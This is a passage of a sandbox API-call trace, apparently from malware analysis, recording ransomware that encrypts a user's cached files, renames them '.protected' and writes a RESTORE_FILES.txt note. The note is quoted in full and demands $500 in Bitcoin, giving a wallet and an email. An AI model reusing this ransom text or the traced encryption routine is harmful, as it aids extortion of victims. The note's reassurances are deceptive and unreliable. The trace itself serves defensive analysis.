pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\..") returned 72 [0084.639] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.639] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.639] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.639] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.639] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.640] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Windows") returned -1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files") returned -1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files (x86)") returned -1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="$Recycle.bin") returned 1 [0084.640] lstrcmpiW (lpString1="1NBUR4HR", lpString2="System Volume Information") returned -1 [0084.640] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 78 [0084.640] lstrcmpW (lpString1="1NBUR4HR", lpString2=".") returned 1 [0084.640] lstrcmpW (lpString1="1NBUR4HR", lpString2="..") returned 1 [0084.640] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*") returned 80 [0084.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.640] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.640] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.640] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0084.640] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.640] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.640] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.") returned 80 [0084.640] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.640] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.640] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.640] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.640] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.641] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.641] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.641] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.641] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.641] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.641] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\..") returned 81 [0084.641] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.641] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.641] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.641] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.641] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.641] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.641] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.641] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.641] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.641] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.641] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.641] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.641] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.642] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.642] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 90 [0084.642] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.642] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.642] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.642] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.643] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.643] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.643] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.643] CloseHandle (hObject=0x150) returned 1 [0084.643] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected") returned 100 [0084.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.protected")) returned 1 [0084.644] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.644] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.644] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.644] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.644] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.644] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.644] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds 
Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.645] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.645] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.645] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 88 [0084.645] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.645] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.645] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.645] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.646] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.646] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.646] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.646] CloseHandle (hObject=0x150) returned 1 [0084.647] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected") returned 98 [0084.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].protected")) returned 1 [0084.648] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.648] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.648] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt") returned 96 [0084.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.651] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.651] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.652] lstrlenA (lpString="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") returned 684 [0084.652] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.652] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.652] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.653] CloseHandle (hObject=0x14c) returned 1 [0084.653] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Windows") returned -1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files") returned -1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files (x86)") returned -1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="$Recycle.bin") returned 1 [0084.653] lstrcmpiW (lpString1="6ASVN7J7", lpString2="System Volume Information") returned -1 [0084.653] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 78 [0084.653] lstrcmpW (lpString1="6ASVN7J7", lpString2=".") returned 1 [0084.653] lstrcmpW (lpString1="6ASVN7J7", lpString2="..") returned 1 [0084.654] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*") returned 80 [0084.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.654] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.654] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.654] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0084.654] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.654] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.654] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.") returned 80 [0084.654] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.654] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.654] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.654] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.654] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.654] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.654] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.654] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.654] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.654] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.654] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.654] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\..") returned 81 [0084.654] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.655] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.655] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.655] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.655] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.655] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.655] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.655] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.655] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.655] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.655] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.655] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini") returned 90 [0084.655] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.656] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.656] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.656] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.657] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, 